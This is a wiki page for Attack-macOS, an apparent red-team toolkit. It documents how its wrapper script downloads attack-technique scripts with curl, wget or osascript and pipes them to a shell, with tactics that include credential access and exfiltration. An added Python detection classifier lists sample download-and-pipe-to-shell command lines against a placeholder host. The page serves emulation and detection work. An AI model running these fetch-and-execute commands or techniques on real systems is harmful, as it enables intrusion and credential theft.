Script Execution.md

Daniel edited this page Sep 15, 2024 · 2 revisions

Overview

Attack-macOS techniques can be executed in two ways:

  1. Using attackmacos.sh:
    This script fetches each technique with curl, wget, or osascript and pipes the downloaded file directly to a shell for execution.

  2. Manual Execution:

  • Run individual scripts directly from the repository for more control.

  • Invoke scripts locally via attackmacos.sh
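
For detection engineering, the fetch-and-pipe behaviour described in item 1 shows up in process command lines. The following is an added example, not code from the attack-macOS project: a Python classifier that labels command lines where a curl, wget, or osascript download is fed to a shell. The page does not show the exact commands attackmacos.sh issues, so the sample lines, the `example.invalid` host, and the label names are assumptions.

```python
import re

SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}
FETCHERS = {"curl", "wget"}
DO_SHELL = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')
TOKEN = re.compile(r"""'[^']*'|"(?:[^"\\]|\\.)*"|\|\||\||[^'"|]+|.""")

def split_pipeline(cmd):
    """Split on unquoted '|' (not '||') so a quoted pipe stays in its stage."""
    stages = [""]
    for tok in TOKEN.findall(cmd):
        if tok == "|":
            stages.append("")
        else:
            stages[-1] += tok
    return [s.strip() for s in stages]

def program(stage):
    """Basename of the command word, skipping sudo and VAR=value prefixes."""
    for word in stage.split():
        if word != "sudo" and not re.fullmatch(r"\w+=\S*", word):
            return word.rsplit("/", 1)[-1]
    return ""

def classify(cmd):
    """Label a command line that downloads a script and feeds it to a shell."""
    stages = split_pipeline(cmd)
    for i, stage in enumerate(stages):
        source = program(stage)
        inner = DO_SHELL.search(stage) if source == "osascript" else None
        if inner:
            body = inner.group(1).replace('\\"', '"')
            nested = classify(body)
            if nested:  # download and shell are both inside the AppleScript
                return "osascript:" + nested
            tools = [p for p in map(program, split_pipeline(body)) if p in FETCHERS]
            source = "osascript:" + tools[0] if tools else source
        piped = any(program(s) in SHELLS for s in stages[i + 1:])
        if source.split(":")[-1] in FETCHERS and piped:
            return source + "-pipe-to-shell"
    return None

# Constructed process command lines; example.invalid is a placeholder host.
SAMPLES = [
    "curl -fsSL https://example.invalid/ttp.sh | bash -s -- --help",
    "wget -qO- https://example.invalid/ttp.sh | sudo sh",
    "osascript -e 'do shell script \"curl -fsSL https://example.invalid/ttp.sh | sh\"'",
    "curl -fsSL https://example.invalid/pkg.tgz | tar xz",
]
```

`classify` returns a label for the first three samples and `None` for the last, which downloads but never hands the data to a shell.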

Usage

Usage: attackmacos.sh --<method> tactic=<Tactic> ttp=<TTP> --args=<arguments>
       attackmacos.sh --local tactic=<Tactic> ttp=<TTP> --args=<arguments>

Methods:
  --curl                 Use curl to download the script.
  --wget                 Use wget to download the script.
  --osascript            Use AppleScript to download the script.
  --local                Execute the script locally.

TTP arguments are unique and will not be listed here.
Check the script documentation or the script itself to find the specific arguments for each TTP.

Available Tactics:
  - Credential_Access
  - Discovery
  - Initial_Access
  - Execution
  - Persistence
  - Privilege_Escalation
  - Defense_Evasion
  - Credential_Exfiltration
  - Impact

Examples:
  ./attackmacos.sh --curl tactic=credential_access ttp=accounts --args=--help
  ./attackmacos.sh --wget tactic=discovery ttp=accounts --args='--verbose --log'
  ./attackmacos.sh --osascript tactic=initial_access ttp=accounts --args='--enable'
  ./attackmacos.sh --local tactic=execution ttp=run_script --args='-s'

Available Methods

  • --curl: Use curl to download the script.
  • --wget: Use wget to download the script.
  • --osascript: Use AppleScript to download the script.

Available Tactics

  • Credential_Access
  • Discovery
  • Initial_Access
  • Execution
  • Persistence
  • Privilege_Escalation
  • Defense_Evasion
  • Credential_Exfiltration
  • Impact

TTP Arguments

TTP arguments are unique to each TTP. Use --args=--help to print available TTP arguments.

Execution Examples

  1. Using curl to fetch a script:

    ./attackmacos.sh --curl tactic=credential_access ttp=accounts --args=--help
    
  2. Using wget to fetch a script:

    ./attackmacos.sh --wget tactic=discovery ttp=accounts --args='--verbose --log'
    
  3. Using osascript to fetch a script:

    ./attackmacos.sh --osascript tactic=initial_access ttp=accounts --args='--enable'
    